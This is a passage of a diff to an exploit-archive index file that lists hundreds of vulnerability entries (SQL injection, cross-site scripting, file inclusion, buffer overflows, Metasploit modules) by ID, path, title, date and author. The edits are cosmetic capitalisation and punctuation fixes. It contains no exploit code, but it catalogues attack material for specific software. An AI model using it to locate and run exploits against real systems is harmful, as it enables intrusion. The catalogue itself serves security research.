1.5 - Local Inet_Server Buffer Overflow Vulnerability",2006-03-13,"Joxean Koret",windows,dos,0 -27419,platforms/php/webapps/27419.txt,"Vegas Forum 1.0 Forumlib.PHP SQL Injection Vulnerability",2006-03-13,"Aliaksandr Hartsuyeu",php,webapps,0 +27419,platforms/php/webapps/27419.txt,"Vegas Forum 1.0 Forumlib.php SQL Injection Vulnerability",2006-03-13,"Aliaksandr Hartsuyeu",php,webapps,0 27420,platforms/multiple/dos/27420.c,"ENet Multiple Denial of Service Vulnerabilities",2006-03-13,"Luigi Auriemma",multiple,dos,0 27421,platforms/multiple/dos/27421.txt,"GGZ Gaming Zone 0.0.12 - Multiple Denial of Service Vulnerabilities",2006-03-14,"Luigi Auriemma",multiple,dos,0 -27422,platforms/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 Post.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 -27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 Index.PHP SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 +27422,platforms/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 Post.php SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 +27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 Index.php SQL Injection Vulnerability",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27424,platforms/php/webapps/27424.txt,"DSDownload 1.0 - Multiple SQL-Injection Vulnerabilities",2006-03-15,"Aliaksandr Hartsuyeu",php,webapps,0 27425,platforms/linux/dos/27425.txt,"Zoo 2.10 - Parse.c Local Buffer Overflow Vulnerability",2006-03-16,"Josh Bressers",linux,dos,0 -27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.PHP Cross-Site Scripting Vulnerability",2006-03-16,Soot,php,webapps,0 +27427,platforms/php/webapps/27427.txt,"Contrexx CMS 1.0.x Index.php Cross-Site Scripting Vulnerability",2006-03-16,Soot,php,webapps,0 27428,platforms/hardware/remote/27428.rb,"D-Link Devices Unauthenticated Remote Command Execution",2013-08-08,metasploit,hardware,remote,0 27429,platforms/windows/remote/27429.rb,"Firefox onreadystatechange Event DocumentViewerImpl Use After Free",2013-08-08,metasploit,windows,remote,0 27430,platforms/php/webapps/27430.txt,"PHPFox 3.6.0 (build3) Multiple SQL Injection Vulnerabilities",2013-08-08,"Matias Fontanini",php,webapps,0 27431,platforms/php/webapps/27431.txt,"BigTree CMS 4.0 RC2 - Multiple Vulnerabilities",2013-08-08,"High-Tech Bridge SA",php,webapps,0 27991,platforms/php/webapps/27991.txt,"PostNuke 0.76 RC2 - Multiple Input Validation Vulnerabilities",2006-06-07,SpC-x,php,webapps,0 -27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 Month.PHP SQL Injection Vulnerability",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 +27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 Month.php SQL Injection Vulnerability",2006-06-07,"CrAzY CrAcKeR",php,webapps,0 27443,platforms/php/webapps/27443.txt,"ExtCalendar 1.0 - Cross-Site Scripting Vulnerabilities",2006-03-18,Soothackers,php,webapps,0 -27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability",2006-03-18,r57shell,php,webapps,0 +27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 Class_DB_MySQL.php Cross-Site Scripting Vulnerability",2006-03-18,r57shell,php,webapps,0 27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 index.php Multiple Parameter SQL Injection",2006-03-18,Linux_Drox,php,webapps,0 27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 index.php Multiple Parameter XSS",2006-03-18,Linux_Drox,php,webapps,0 27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 cart.php Multiple Parameter XSS",2006-03-18,Linux_Drox,php,webapps,0 @@ -24555,29 +24555,29 @@ id,file,description,date,author,platform,type,port 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Remote Directory Traversal Vulnerability",2006-02-24,raphael.huck@free.fr,php,webapps,0 27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 Haydn.EXE Cross-Site Scripting Vulnerability",2006-03-20,"Alberto Soli",cgi,webapps,0 27452,platforms/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN Cross-Site Scripting Vulnerability",2006-03-21,"ILION Research",hardware,remote,0 -27453,platforms/php/webapps/27453.txt,"PHP Live! 3.0 Status_Image.PHP Cross-Site Scripting Vulnerability",2006-03-22,kspecial,php,webapps,0 +27453,platforms/php/webapps/27453.txt,"PHP Live! 3.0 Status_Image.php Cross-Site Scripting Vulnerability",2006-03-22,kspecial,php,webapps,0 27454,platforms/php/webapps/27454.txt,"Motorola Bluetooth Interface Dialog Spoofing Vulnerability",2006-03-22,kspecial,php,webapps,0 27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 -27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 /news/newsView.cfm NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 -27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 -27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0 -27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.PHP Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0 +27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - /news/newsView.cfm NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 +27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 +27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 Img.php Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0 +27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 Img.php Cross-Site Scripting Vulnerability",2006-03-23,FarhadKey,php,webapps,0 27460,platforms/multiple/dos/27460.pl,"RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities",2006-03-23,"Federico L. Bossi Bonin",multiple,dos,0 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 -27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.PHP SQL Injection Vulnerability",2003-03-23,r0t,php,webapps,0 +27462,platforms/php/webapps/27462.txt,"AdMan 1.0.20051221 ViewStatement.php SQL Injection Vulnerability",2003-03-23,r0t,php,webapps,0 27463,platforms/jsp/webapps/27463.txt,"IBM Tivoli Business Systems Manager 3.1 APWC_Win_Main.JSP Cross-Site Scripting Vulnerability",2006-03-23,anonymous,jsp,webapps,0 27464,platforms/cgi/webapps/27464.txt,"Cholod MySQL Based Message Board Mb.CGI SQL Injection Vulnerability",2006-03-24,kspecial,cgi,webapps,0 -27465,platforms/php/webapps/27465.txt,"VihorDesign Index.PHP Cross-Site Scripting Vulnerability",2006-03-24,botan,php,webapps,0 -27466,platforms/php/webapps/27466.txt,"VihorDesign Index.PHP Remote File Include Vulnerability",2006-03-24,botan,php,webapps,0 -27467,platforms/php/webapps/27467.txt,"ConfTool 1.1 Index.PHP Cross-Site Scripting Vulnerability",2006-03-27,botan,php,webapps,0 -27468,platforms/php/webapps/27468.txt,"Nuked-Klan 1.x Index.PHP SQL Injection Vulnerability",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 +27465,platforms/php/webapps/27465.txt,"VihorDesign Index.php Cross-Site Scripting Vulnerability",2006-03-24,botan,php,webapps,0 +27466,platforms/php/webapps/27466.txt,"VihorDesign Index.php Remote File Include Vulnerability",2006-03-24,botan,php,webapps,0 +27467,platforms/php/webapps/27467.txt,"ConfTool 1.1 Index.php Cross-Site Scripting Vulnerability",2006-03-27,botan,php,webapps,0 +27468,platforms/php/webapps/27468.txt,"Nuked-Klan 1.x Index.php SQL Injection Vulnerability",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27469,platforms/asp/webapps/27469.txt,"EZHomePagePro 1.5 email.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 27470,platforms/asp/webapps/27470.txt,"EZHomePagePro 1.5 users_search.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 27471,platforms/asp/webapps/27471.txt,"EZHomePagePro 1.5 users_calendar.asp page Parameter XSS",2006-03-27,r0t,asp,webapps,0 27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 users_profiles.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 27473,platforms/asp/webapps/27473.txt,"EZHomePagePro 1.5 users_mgallery.asp usid Parameter XSS",2006-03-27,r0t,asp,webapps,0 27474,platforms/multiple/dos/27474.txt,"LibVC VCard 003 Processing Buffer Overflow Vulnerability",2006-03-21,trew,multiple,dos,0 -27475,platforms/php/webapps/27475.txt,"SaphpLesson 2.0 Print.PHP SQL Injection Vulnerability",2006-03-27,Linux_Drox,php,webapps,0 +27475,platforms/php/webapps/27475.txt,"SaphpLesson 2.0 Print.php SQL Injection Vulnerability",2006-03-27,Linux_Drox,php,webapps,0 27476,platforms/windows/dos/27476.txt,"Microsoft .NET Framework SDK 1.0/1.1 MSIL Tools Buffer Overflow Vulnerabilities",2006-03-27,"Dinis Cruz",windows,dos,0 27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 print.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 mail.php Multiple Parameter SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24587,7 +24587,7 @@ id,file,description,date,author,platform,type,port 27482,platforms/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 - Cross-Site Scripting Vulnerability",2006-03-27,r0t,asp,webapps,0 27483,platforms/php/webapps/27483.txt,"Pixel Motion - admin/index.php Multiple Field SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27484,platforms/php/webapps/27484.txt,"Pixel Motion - index.php date Parameter SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 -27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 Index.PHP Multiple SQL Injection Vulnerabilities",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 +27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 Index.php Multiple SQL Injection Vulnerabilities",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 beta domains.asp txtDomainName Parameter XSS",2006-03-27,r0t,asp,webapps,0 27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 beta default.asp Multiple Parameter XSS",2006-03-27,r0t,asp,webapps,0 27488,platforms/cgi/webapps/27488.txt,"BlankOL 1.0 Bol.CGI Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,cgi,webapps,0 @@ -24608,16 +24608,16 @@ id,file,description,date,author,platform,type,port 27506,platforms/php/webapps/27506.txt,"Connect Daily 3.2.8/3.2.9 ViewWeek.html week Parameter XSS",2006-03-28,r0t,php,webapps,0 27507,platforms/php/webapps/27507.txt,"AL-Caricatier 2.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,Linux_Drox,php,webapps,0 27508,platforms/php/remote/27508.txt,"PHP 4.x/5.x - Html_Entity_Decode() Information Disclosure Vulnerability",2006-03-29,Samuel,php,remote,0 -27509,platforms/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk Index.PHP SQL Injection Vulnerability",2006-03-28,Preddy,php,webapps,0 +27509,platforms/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk Index.php SQL Injection Vulnerability",2006-03-28,Preddy,php,webapps,0 27510,platforms/php/webapps/27510.txt,"PhxContacts 0.93 carnet.php Multiple Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 27511,platforms/php/webapps/27511.txt,"PhxContacts 0.93 contact_view.php id_contact Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 -27512,platforms/php/webapps/27512.txt,"PhxContacts 0.93 Login.PHP Cross-Site Scripting Vulnerability",2006-03-29,DaBDouB-MoSiKaR,php,webapps,0 +27512,platforms/php/webapps/27512.txt,"PhxContacts 0.93 Login.php Cross-Site Scripting Vulnerability",2006-03-29,DaBDouB-MoSiKaR,php,webapps,0 27513,platforms/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injection Vulnerabilities",2006-03-30,"Aliaksandr Hartsuyeu",php,webapps,0 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Adding/Editing New Administrator Account CSRF",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27518,platforms/php/webapps/27518.txt,"MLMAuction Script (gallery.php id param) - SQL Injection",2013-08-12,3spi0n,php,webapps,0 27519,platforms/php/webapps/27519.txt,"phpVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 -27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 Index.PHP Cross-Site Scripting Vulnerability",2006-04-24,mayank,php,webapps,0 +27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 Index.php Cross-Site Scripting Vulnerability",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 27522,platforms/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities",2013-08-12,LiquidWorm,php,webapps,80 27533,platforms/php/webapps/27533.txt,"X-Changer 0.20 - Multiple SQL Injection Vulnerabilities",2006-03-30,"Morocco Security Team",php,webapps,0 @@ -24630,10 +24630,10 @@ id,file,description,date,author,platform,type,port 27530,platforms/multiple/remote/27530.rb,"Squash YAML Code Execution",2013-08-12,metasploit,multiple,remote,0 27531,platforms/php/webapps/27531.txt,"WordPress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 27532,platforms/php/webapps/27532.txt,"Joomla redSHOP Component 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 -27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery Index.PHP Remote File Include Vulnerability",2006-03-30,"Morocco Security Team",php,webapps,0 -27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 Post.PHP SQL Injection Vulnerability",2006-03-30,"Morocco Security Team",php,webapps,0 +27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery Index.php Remote File Include Vulnerability",2006-03-30,"Morocco Security Team",php,webapps,0 +27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 Post.php SQL Injection Vulnerability",2006-03-30,"Morocco Security Team",php,webapps,0 27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - Searchresults.ASP Cross-Site Scripting Vulnerability",2006-03-31,r0t,asp,webapps,0 -27537,platforms/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c Index.PHP Remote File Include Vulnerability",2006-03-31,botan,php,webapps,0 +27537,platforms/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c Index.php Remote File Include Vulnerability",2006-03-31,botan,php,webapps,0 27538,platforms/php/webapps/27538.txt,"RedCMS 0.1 profile.php u Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 login.php Multiple Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 27540,platforms/php/webapps/27540.txt,"RedCMS 0.1 register.php Multiple Field XSS",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24641,9 +24641,9 @@ id,file,description,date,author,platform,type,port 27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery - suggest_image.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery - insert_rating.php img_id Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery - images.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27547,platforms/multiple/dos/27547.txt,"zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0 -27548,platforms/php/webapps/27548.txt,"Claroline 1.x Rqmkhtml.PHP Information Disclosure Vulnerability",2006-03-31,rgod,php,webapps,0 -27549,platforms/php/webapps/27549.txt,"Claroline 1.x RQMKHTML.PHP Cross-Site Scripting Vulnerability",2006-03-31,rgod,php,webapps,0 +27547,platforms/multiple/dos/27547.txt,"Zdaemon 1.8.1 - Multiple Vulnerabilities",2006-03-31,"Luigi Auriemma",multiple,dos,0 +27548,platforms/php/webapps/27548.txt,"Claroline 1.x Rqmkhtml.php Information Disclosure Vulnerability",2006-03-31,rgod,php,webapps,0 +27549,platforms/php/webapps/27549.txt,"Claroline 1.x RQMKHTML.php Cross-Site Scripting Vulnerability",2006-03-31,rgod,php,webapps,0 27550,platforms/php/webapps/27550.txt,"blank'n'berg 0.2 - Directory Traversal Vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 27551,platforms/php/webapps/27551.txt,"Blank'N'Berg 0.2 - Cross-Site Scripting Vulnerability",2006-03-31,"Amine ABOUD",php,webapps,0 27552,platforms/asp/webapps/27552.txt,"ISP Site Man - Admin_Login.ASP SQL Injection Vulnerability",2006-04-01,s3rv3r_hack3r,asp,webapps,0 @@ -24656,35 +24656,35 @@ id,file,description,date,author,platform,type,port 27560,platforms/php/webapps/27560.txt,"aWebNews 1.2 - visview.php _GET['cid'] Parameter SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",php,webapps,0 27561,platforms/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x index.cgi Multiple Parameter XSS",2006-04-03,r0t,cgi,webapps,0 27562,platforms/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x mods/calendar/index.cgi vsSD Parameter XSS",2006-04-03,r0t,cgi,webapps,0 -27563,platforms/php/webapps/27563.txt,"LucidCMS 2.0 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,"Rusydi Hasan",php,webapps,0 +27563,platforms/php/webapps/27563.txt,"LucidCMS 2.0 Index.php Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,"Rusydi Hasan",php,webapps,0 27564,platforms/php/remote/27564.txt,"PHP 4.x/5.0/5.1 PHPInfo Large Input Cross-Site Scripting Vulnerability",2006-04-03,"Maksymilian Arciemowicz",php,remote,0 27565,platforms/windows/remote/27565.txt,"HP Color LaserJet 2500/4600 Toolbox - Directory Traversal Vulnerability",2006-04-03,"Richard Horsman",windows,remote,0 27566,platforms/multiple/dos/27566.txt,"Doomsday 1.8/1.9 - Multiple Remote Format String Vulnerabilities",2005-04-03,"Luigi Auriemma",multiple,dos,0 27567,platforms/php/webapps/27567.txt,"ArabPortal 2.0.1 - Multiple Input Validation Vulnerabilities",2006-04-04,o.y.6,php,webapps,0 27568,platforms/windows/remote/27568.py,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (1)",2006-04-04,"Luigi Auriemma",windows,remote,0 27569,platforms/windows/remote/27569.txt,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (2)",2006-04-04,"Luigi Auriemma",windows,remote,0 -27570,platforms/php/webapps/27570.txt,"Chucky A. Ivey N.T. 1.1 Index.PHP Multiple HTML Injection Vulnerabilities",2006-04-05,"Aliaksandr Hartsuyeu",php,webapps,0 +27570,platforms/php/webapps/27570.txt,"Chucky A. Ivey N.T. 1.1 Index.php Multiple HTML Injection Vulnerabilities",2006-04-05,"Aliaksandr Hartsuyeu",php,webapps,0 27571,platforms/php/webapps/27571.txt,"SKForum 1.x area.View.action areaID Parameter XSS",2006-04-06,r0t,php,webapps,0 27572,platforms/php/webapps/27572.txt,"SKForum 1.x planning.View.action time Parameter XSS",2006-04-06,r0t,php,webapps,0 27573,platforms/php/webapps/27573.txt,"SKForum 1.x user.View.action userID Parameter XSS",2006-04-06,r0t,php,webapps,0 27574,platforms/php/webapps/27574.txt,"Basic Analysis and Security Engine 1.2.4 PrintFreshPage Cross-Site Scripting Vulnerability",2003-04-06,"Adam Ely",php,webapps,0 -27575,platforms/php/webapps/27575.txt,"MD News 1 Admin.PHP SQL Injection Vulnerability",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 -27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 PNuserapi.PHP SQL Injection Vulnerability",2006-04-06,king_purba,php,webapps,0 +27575,platforms/php/webapps/27575.txt,"MD News 1 Admin.php SQL Injection Vulnerability",2006-04-06,"Aliaksandr Hartsuyeu",php,webapps,0 +27576,platforms/php/webapps/27576.txt,"MAXDEV CMS 1.0.72/1.0.73 PNuserapi.php SQL Injection Vulnerability",2006-04-06,king_purba,php,webapps,0 27577,platforms/windows/remote/27577.txt,"Microsoft Internet Explorer 5.0 Address Bar Spoofing Vulnerability",2006-04-03,"Hai Nam Luke",windows,remote,0 -27578,platforms/php/webapps/27578.txt,"Jupiter CMS 1.1.5 Index.PHP Cross-Site Scripting Vulnerability",2006-04-07,KaDaL-X,php,webapps,0 +27578,platforms/php/webapps/27578.txt,"Jupiter CMS 1.1.5 Index.php Cross-Site Scripting Vulnerability",2006-04-07,KaDaL-X,php,webapps,0 27579,platforms/php/webapps/27579.txt,"Bitweaver CMS 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-07,KaDaL-X,php,webapps,0 -27580,platforms/php/webapps/27580.txt,"vBulletin 3.5.1 Vbugs.PHP Cross-Site Scripting Vulnerability",2006-04-07,r0t,php,webapps,0 +27580,platforms/php/webapps/27580.txt,"vBulletin 3.5.1 Vbugs.php Cross-Site Scripting Vulnerability",2006-04-07,r0t,php,webapps,0 27581,platforms/linux/dos/27581.txt,"Tony Cook Imager 0.4x JPEG and TGA Images Denial of Service Vulnerability",2006-04-07,"Kjetil Kjernsmo",linux,dos,0 27582,platforms/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 - Cross-Site Scripting Vulnerability",2006-04-07,benozor77,php,webapps,0 27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 Deptname Parameter Cross-Site Scripting Vulnerability",2006-04-07,r0t,cgi,webapps,0 -27584,platforms/php/webapps/27584.txt,"JBook 1.3 Index.PHP Cross-Site Scripting Vulnerability",2006-04-10,Psych0,php,webapps,0 +27584,platforms/php/webapps/27584.txt,"JBook 1.3 Index.php Cross-Site Scripting Vulnerability",2006-04-10,Psych0,php,webapps,0 27585,platforms/php/webapps/27585.txt,"phpMyForum 4.0 index.php page Parameter XSS",2006-04-10,Psych0,php,webapps,0 27586,platforms/php/webapps/27586.txt,"phpMyForum 4.0 index.php type Variable CRLF Injection",2006-04-10,Psych0,php,webapps,0 27587,platforms/php/webapps/27587.txt,"PhpWebGallery 1.4.1 category.php Multiple Parameter XSS",2006-04-10,Psych0,php,webapps,0 27588,platforms/php/webapps/27588.txt,"PhpWebGallery 1.4.1 picture.php Multiple Parameter XSS",2006-04-10,Psych0,php,webapps,0 -27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 Spip_login.PHP Remote File Include Vulnerability",2006-04-10,cR45H3R,php,webapps,0 -27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 Modules.PHP Multiple SQL Injection Vulnerabilities",2005-04-10,r0t,php,webapps,0 -27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 Load.PHP Cross-Site Scripting Vulnerability",2006-04-10,Liz0ziM,php,webapps,0 +27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 Spip_login.php Remote File Include Vulnerability",2006-04-10,cR45H3R,php,webapps,0 +27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 Modules.php Multiple SQL Injection Vulnerabilities",2005-04-10,r0t,php,webapps,0 +27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 Load.php Cross-Site Scripting Vulnerability",2006-04-10,Liz0ziM,php,webapps,0 27592,platforms/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload Vulnerability",2006-04-10,simo64,php,webapps,0 27593,platforms/php/webapps/27593.txt,"VegaDNS 0.9.9 index.php cid Parameter SQL Injection",2006-04-10,Ph03n1X,php,webapps,0 27594,platforms/cgi/webapps/27594.txt,"Matt Wright Guestbook 2.3.1 Guestbook.PL Multiple HTML Injection Vulnerabilities",2006-04-07,Liz0ziM,cgi,webapps,0 @@ -24714,17 +24714,17 @@ id,file,description,date,author,platform,type,port 27619,platforms/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 detail.php page Parameter XSS",2006-04-11,0o_zeus_o0,php,webapps,0 27620,platforms/cgi/webapps/27620.txt,"Microsoft FrontPage Server Extensions Cross-Site Scripting Vulnerability",2006-04-11,"Esteban Martinez Fayo",cgi,webapps,0 27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 Connect.INC Information Disclosure Vulnerability",2006-04-11,"M.Hasran Addahroni",php,webapps,0 -27622,platforms/php/webapps/27622.txt,"Dokeos 1.x Viewtopic.PHP SQL Injection Vulnerability",2006-04-11,"Alvaro Olavarria",php,webapps,0 +27622,platforms/php/webapps/27622.txt,"Dokeos 1.x Viewtopic.php SQL Injection Vulnerability",2006-04-11,"Alvaro Olavarria",php,webapps,0 27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 Jahr Parameter Cross-Site Scripting Vulnerability",2006-04-11,Snake_23,php,webapps,0 -27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 Include.PHP SQL Injection Vulnerability",2006-04-11,"Hamid Ebadi",php,webapps,0 +27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 Include.php SQL Injection Vulnerability",2006-04-11,"Hamid Ebadi",php,webapps,0 27625,platforms/php/webapps/27625.txt,"Indexu 5.0 - Multiple Remote File Include Vulnerabilities",2006-04-11,SnIpEr_SA,php,webapps,0 27626,platforms/php/webapps/27626.txt,"Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-11,d4igoro,php,webapps,0 27627,platforms/windows/remote/27627.txt,"Saxopress URL Parameter Directory Traversal Vulnerability",2006-04-11,SecuriTeam,windows,remote,0 -27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 Index.PHP SQL Injection Vulnerability",2006-04-11,LoK-Crew,php,webapps,0 -27629,platforms/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 Index.PHP SQL Injection Vulnerability",2006-04-12,Dr.Jr7,php,webapps,0 +27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 Index.php SQL Injection Vulnerability",2006-04-11,LoK-Crew,php,webapps,0 +27629,platforms/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 Index.php SQL Injection Vulnerability",2006-04-12,Dr.Jr7,php,webapps,0 27630,platforms/linux/remote/27630.txt,"Plone 2.x MembershipTool Access Control Bypass Vulnerability",2006-04-12,MJ0011,linux,remote,0 27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0 -27632,platforms/php/webapps/27632.txt,"PHPMyAdmin 2.7 SQL.PHP Cross-Site Scripting Vulnerability",2005-10-31,p0w3r,php,webapps,0 +27632,platforms/php/webapps/27632.txt,"phpMyAdmin 2.7 - SQL.php Cross-Site Scripting Vulnerability",2005-10-31,p0w3r,php,webapps,0 27635,platforms/linux/dos/27635.txt,"Mozilla Firefox 1.0.x/1.5 HTML Parsing Null Pointer Dereference Denial of Service Vulnerability",2006-04-13,"Thomas Waldegger",linux,dos,0 27636,platforms/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions ads-readerext actionID Parameter XSS",2006-04-13,"Tan Chew Keong",multiple,remote,0 27637,platforms/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions AlterCast op Parameter XSS",2006-04-13,"Tan Chew Keong",multiple,remote,0 @@ -24732,43 +24732,43 @@ id,file,description,date,author,platform,type,port 27639,platforms/multiple/dos/27639.txt,"W3C Amaya 9.4 textarea rows Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0 27640,platforms/multiple/dos/27640.txt,"W3C Amaya 9.4 legend color Attribute Value Overflow",2006-04-13,"Thomas Waldegger",multiple,dos,0 27641,platforms/linux/dos/27641.txt,"Opera Web Browser 8.52 Stylesheet Attribute Buffer Overflow Vulnerability",2006-04-13,"SEC Consult",linux,dos,0 -27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 Print.PHP Cross-Site Scripting 